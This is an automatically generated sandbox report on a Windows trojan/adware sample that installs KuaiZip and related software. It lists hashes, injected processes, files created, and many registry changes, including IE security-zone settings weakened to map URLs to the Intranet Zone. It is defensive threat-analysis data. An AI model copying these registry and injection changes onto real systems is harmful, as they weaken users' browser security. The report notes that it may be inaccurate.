Gen.Variant.Adware.Graftor.167470_a6590134fc
Gen:Variant.Adware.Graftor.167470 (B) (Emsisoft), Gen:Variant.Adware.Graftor.167470 (AdAware), Backdoor.Win32.Farfli.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Worm, EmailWorm, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: a6590134fc71addea0a3adac511f2071
SHA1: 2a56335dbee6673754e718854f279f9a18ab21c6
SHA256: b9f9e1d29939971aa038c5f5db14df9e7cbab3efdf4b6d2717ab2c497ceb1422
SSDeep: 12288:p wqYiMjW3Y6i2JfOeZgNeiRDE3gemnNR :QwqYna3d2eZgNeiRQ3ge0Y
Size: 474112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-20 03:41:40
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
taskkill.exe:1876
taskkill.exe:1492
taskkill.exe:1840
taskkill.exe:580
KuaiZip_Setup_union123_0088.exe:552
KZReport.exe:892
net1.exe:1484
ping.exe:468
KuaiZip.exe:856
net.exe:1864
regsvr32.exe:604
regsvr32.exe:1676
regsvr32.exe:628
regsvr32.exe:1460
LockPage.exe:1212
at.exe:1788
at.exe:496
The Trojan injects its code into the following process(es):
duba_u20862342_sv1_3_18.exe:632
%original file name%.exe:756
2345pic_k1252705.exe:1360
Mutexes
The following mutexes were created/opened:
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
RasPbFile
ShimCacheMutex
File activity
The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\快压\data\slimdata.dat (784 bytes)
%Program Files%\快压\ErrorMsg.xml (196 bytes)
%Program Files%\快压\readme.txt (1 bytes)
%Program Files%\快压\X86\KZReport.exe (7523 bytes)
%Program Files%\快压\X86\Uninst.exe (8994 bytes)
%Program Files%\快压\7zNew.dat (32 bytes)
%Program Files%\快压\X86\SetupHelper.exe (863 bytes)
%Program Files%\快压\X86\KZMount2.exe (3478 bytes)
%Program Files%\快压\X86\reportframework.dll (7405 bytes)
%Program Files%\快压\X86\sfx\kzSetup_chs.sfx (5506 bytes)
%Program Files%\快压\SLDefault.xml (196 bytes)
%Program Files%\快压\X86\KZModule.dll (6778 bytes)
%Program Files%\快压\X86\KZipShell.dll (3047 bytes)
%Program Files%\快压\ali\kzshop.ico (1686 bytes)
%Program Files%\快压\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\快压.lnk (661 bytes)
%Program Files%\快压\X86\KZFormat.dll (2224 bytes)
%Program Files%\快压\skin\disopt.skn (3635 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Program Files%\快压\X86\kuaizipUpdateChecker.dll (393 bytes)
%Program Files%\快压\X86\Mount.dll (1686 bytes)
%Program Files%\快压\X86\finderlib.dll (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z.MD5 (33 bytes)
%Program Files%\快压\X86\KuaiZip.exe (12581 bytes)
%Program Files%\快压\KzNew.dat (74 bytes)
%Program Files%\快压\ZipNew.dat (22 bytes)
%Program Files%\快压\X86\MountCore.dll (1059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (38588 bytes)
%Program Files%\快压\__-________.URL (49 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z (38588 bytes)
%Program Files%\快压\X86\DiskOpt.exe (4801 bytes)
%Documents and Settings%\%current user%\Start Menu\快压.lnk (661 bytes)
%Program Files%\快压\X86\UpdateChecker.exe (4527 bytes)
%Program Files%\快压\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\快压\X86\KZTui.exe (4527 bytes)
%Program Files%\快压\X86\Update.exe (7758 bytes)
%Program Files%\快压\X86\DuiLib.dll (4801 bytes)
%Program Files%\快压\ali\jp.png (392 bytes)
%Program Files%\快压\X86\lang\Chs_Lang.dll (1020 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (0 bytes)
The process KuaiZip.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
The process %original file name%.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\js1[1] (623688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\bjzy3[1] (147925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\js2[1] (664204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\js3[1] (672184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l5qvobehj20c80gbnpk[1].jpg (367545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\6da25678gw1f1l8xa7bhsj20c80gbu12[1].jpg (648672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\uc2[1] (947341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\uc3[1] (547626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1la7wjwlnj20c80gbnpj[1].jpg (787198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\uc1[1] (911426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l8knvnatj20c80gbu12[1].jpg (680643 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\快压.lnk (0 bytes)
The process 2345pic_k1252705.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (39245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll (36078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\modern-header.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\FileInfo.dll (4992 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process LockPage.exe:1212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\System\safemonn32.dll (180 bytes)
%Program Files%\Common Files\System\config.dat (143 bytes)
%Program Files%\Common Files\System\safe.dat (3719 bytes)
%Program Files%\Common Files\System\OverlayIcon.dll (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.dat (3719 bytes)
C:\unit.bat (103 bytes)
Registry activity
The process taskkill.exe:1876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 58 3C 46 AC 14 ED C7 61 3B B0 11 80 51 4E D3"
The process taskkill.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E B4 8A 9F A5 04 F7 BA 1D E6 6E CE C2 75 FA A3"
The process taskkill.exe:1840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 9E 43 DA F3 46 11 CB 18 E1 CC F5 98 5F E3 F7"
The process taskkill.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 DD 96 53 8A 82 6F EE 5F B5 10 C7 2F 53 50 3B"
The process KuaiZip_Setup_union123_0088.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"sfx" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayIcon" = "%Program Files%\快压\X86\Uninst.exe"
[HKCU\Software\KuaiZipSFX\快压]
"ChannelID" = "union123_0088"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"Mount.dll" = "0"
[HKCU\Software\SNDA]
"PCID" = "J630eda2537585b8645a6e7879b8a0d8b205ed5f8bb90ef1b5872e8e742772757"
[HKCU\Software\KuaiZipSFX\快压\Files\X86\lang]
"Chs_Lang.dll" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files]
"readme.txt" = "0"
"x86" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"InstallDate" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\KuaiZipSFX\快压\Files]
"快压-压缩和解压缩利器.URL" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\快压\X86]
"KZReport.exe" = "KZReport"
[HKCU\Software\KuaiZip\Install]
"p_c" = "FA FD 39 AC 0B 9D 7B 13 49 92 B6 B2 3F 23 0B 0C"
"p_d" = "C5 2F 64 ED 43 DA 8B 17 D5 D8 81 BC 1C 20 80 76"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"SendEverBox" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCR\.zip\ShellNew]
"FileName" = "%Program Files%\快压\zipnew.dat"
[HKCU\Software\KuaiZip\Install]
"p_m" = "43 70 B4 95 6B E8 63 CA E7 DA 7A E0 7D 7F D0 53"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KZMount2.exe" = "0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\快压\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"DisplayName" = "快压"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"DuiLib.dll" = "0"
"KuaiZip.exe" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\KuaiZip\Install]
"InstallCount" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\KuaiZip\Install]
"Version" = "2.8.14.2"
[HKCU\Software\KuaiZipSFX\快压\Files\skin]
"disopt.skn" = "0"
[HKCU\Software\KuaiZipSFX\快压]
"Version" = "2.8.14.2"
[HKCU\Software\KuaiZip\Install]
"md5" = "E4283218755BC37E5CA88875F91BE373"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\KuaiZip\Install]
"Path" = "%Program Files%\快压\"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"lang" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"AppendMenu" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\KuaiZipSFX\快压\Files]
"data" = "0"
[HKCU\Software\KuaiZip\Report\offline\install]
"Code" = "0B 30 3D 16 08 58 73 AC 80 52 4A FE 81 44 4F 6F"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KZFormat.dll" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files]
"7zNew.dat" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"kuaizipUpdateChecker.dll" = "0"
"update.exe" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 39 5A 69 51 B0 78 6E 94 8B EC 9F 93 B4 AD 45"
[HKCU\Software\KuaiZipSFX\快压\Files]
"skin" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"SetupHelper.exe" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\快压\X86]
"KuaiZip.exe" = "KuaiZip Application"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"reportframework.dll" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\ali]
"jp.png" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KuaiZipDrive.sys" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"StoreOnly" = "*.MPEG *.MPG *.DAT *.avi *.mov *.asf *.3gp *.mkv *.flv *.ra *.rm *.ram *.aiff *.au *.midi *.vqf *.ogg *.mid *.aac *.ape"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"DiskOpt.exe" = "0"
"7z.dll" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files]
"SLDefault.xml" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"finderlib.dll" = "0"
[HKCU\Software\KuaiZipSFX\快压]
"Path" = "%Program Files%\快压\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"uninst.exe" = "0"
[HKCU\Software\KuaiZip\Install]
"InstallDate" = "160411"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Name" = "ѹËõ²¢Ãë´«·ÖÃÂøøºÃÓÑ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"UninstallString" = "%Program Files%\快压\X86\Uninst.exe"
"DisplayVersion" = "2.8.14.2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"MountCore.dll" = "0"
[HKCR\.7z\ShellNew]
"FileName" = "%Program Files%\快压\7znew.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"LastUpdateDate" = "Type: REG_QWORD, Length: 8"
[HKCU\Software\KuaiZipSFX\快压\Files]
"ali" = "0"
"KzNew.dat" = "0"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"ExeImmi" = "1"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KZipShell.dll" = "0"
"KZReport.exe" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"AT.exe" = "Schedule service command line interface"
[HKCU\Software\KuaiZipSFX\快压\Files]
"ZipNew.dat" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.kz\ShellNew]
"FileName" = "%Program Files%\快压\KzNew.dat"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KZModule.dll" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\KuaiZip\Install]
"qid" = "union123_0088"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"UpdateChecker.exe" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1460397275"
[HKCU\Software\KuaiZipSFX\快压\Files\X86\sfx]
"kzSetup_chs.sfx" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\ali]
"kzshop.ico" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\KuaiZipSFX\快压\Files\X86]
"KZTui.exe" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files\data]
"slimdata.dat" = "0"
[HKCU\Software\KuaiZipSFX\快压\Files]
"ErrorMsg.xml" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\KuaiZip\Report\offline\install]
"Path" = "72 34 FE 03 DC A6 9E A4 8F 09 CE 4E 34 23 3D 7F"
[HKCU\Software\KuaiZip\KuaiZip\Profiles\0]
"Default" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip]
"Publisher" = "上海广ä¹Â网络科技有é™Âå…¬å¸"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\KuaiZip]
[HKCU\Software\KuaiZip\Report]
The process KZReport.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 96 C7 88 67 41 F8 D9 01 9F B5 E4 54 F8 DC FF"
[HKCU\Software\KuaiZip\Report]
"OnlineLastDate" = "2016/04/11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\KuaiZip\Report]
"LastQueryDate" = "2016/04/11"
"Desktop" = "2016/04/11"
"DefaultSoftTimestamp" = "1460397302"
The Trojan deletes the following registry key(s):
[HKCU\Software\KuaiZip\Report\offline\install]
The process net1.exe:1484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 83 7E DB DE 6E 05 34 0F 75 02 D6 7D 11 1A E9"
The process ping.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 23 FF D9 4D 1A F4 F9 16 97 39 5B 19 74 50 78"
The process duba_u20862342_sv1_3_18.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 2E 02 E3 93 B4 08 5F 4E C6 40 37 B6 4B 15 07"
The process KuaiZip.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\KuaiZip_FileAsso.Origin\.002]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.004]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.087]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.027]
"(Default)" = "快压 027 压缩文件"
[HKCR\KuaiZip.gz\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.004\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.039]
"(Default)" = "KuaiZip.039"
[HKCR\KuaiZip.081\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.074\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.061]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.013]
"set" = "1"
[HKCR\KuaiZip.025]
"(Default)" = "快压 025 压缩文件"
[HKCR\KuaiZip.083\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.051]
"(Default)" = "KuaiZip.051"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.057]
"set" = "1"
[HKCR\KuaiZip_FileAsso.Origin\.082]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\KuaiZip_FileAsso.Origin\.098]
"(Default)" = "NoAssociate.KZ"
[HKCR\.017]
"(Default)" = "KuaiZip.017"
[HKCR\.021]
"(Default)" = "KuaiZip.021"
[HKCR\KuaiZip.mou\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.06\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.095]
"(Default)" = "NoAssociate.KZ"
[HKCR\.061]
"(Default)" = "KuaiZip.061"
[HKCR\.001]
"(Default)" = "KuaiZip.001"
[HKCR\KuaiZip.038\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.040\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.086]
"(Default)" = "KuaiZip.086"
[HKCR\KuaiZip_FileAsso.Origin\.03]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.055]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.059]
"set" = "1"
[HKCR\.031]
"(Default)" = "KuaiZip.031"
[HKCR\KuaiZip_FileAsso.Origin\.021]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.014]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.086]
"set" = "1"
[HKCR\KuaiZip.kz]
"(Default)" = "快压 KZ 压缩文件"
[HKCR\KuaiZip.096]
"(Default)" = "快压 096 压缩文件"
[HKCR\KuaiZip.066\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.069]
"(Default)" = "快压 069 压缩文件"
[HKCR\.097]
"(Default)" = "KuaiZip.097"
[HKCR\KuaiZip.047]
"(Default)" = "快压 047 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.arj]
"set" = "1"
[HKCR\KuaiZip.zip\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,2"
[HKCR\KuaiZip.026\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.z\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.tar]
"(Default)" = "KuaiZip.tar"
[HKCR\.007]
"(Default)" = "KuaiZip.007"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.037]
"set" = "1"
[HKCR\.067]
"(Default)" = "KuaiZip.067"
[HKCR\KuaiZip.024]
"(Default)" = "快压 024 压缩文件"
[HKCR\KuaiZip.bz2\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.035\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.08]
"(Default)" = "快压 08 压缩文件"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.03]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.tar]
"set" = "1"
[HKCR\KuaiZip.rpm\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip_FileAsso.Origin\.059]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.052\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.03\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.071\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.025]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.bz2]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.050]
"set" = "1"
[HKCR\KuaiZip.011\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.060]
"(Default)" = "KuaiZip.060"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.z]
"set" = "1"
[HKCR\KuaiZip.041\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.012\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.028\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\.010]
"(Default)" = "KuaiZip.010"
[HKCR\KuaiZip.073]
"(Default)" = "快压 073 压缩文件"
[HKCR\.047]
"(Default)" = "KuaiZip.047"
[HKCR\KuaiZip.028\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.016\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.02\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.038\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.046\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,0"
[HKCR\.066]
"(Default)" = "KuaiZip.066"
[HKCR\.07]
"(Default)" = "KuaiZip.07"
[HKCR\.076]
"(Default)" = "KuaiZip.076"
[HKCR\.090]
"(Default)" = "KuaiZip.090"
[HKCR\KuaiZip_FileAsso.Origin\.018]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.09]
"(Default)" = "快压 09 压缩文件"
[HKCR\KuaiZip.014]
"(Default)" = "快压 014 压缩文件"
[HKCR\KuaiZip.kz\DefaultIcon]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe,1"
[HKCR\KuaiZip_FileAsso.Origin\.028]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.gzip]
"(Default)" = "快压 GZIP 压缩文件"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.mou]
"set" = "1"
[HKCR\KuaiZip.058\shell\open\command]
"(Default)" = "%Program Files%\快压\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.076]
"(Default)" = "快压 076 压缩文件"
[HKCR\KuaiZip.085\shell\open\command]
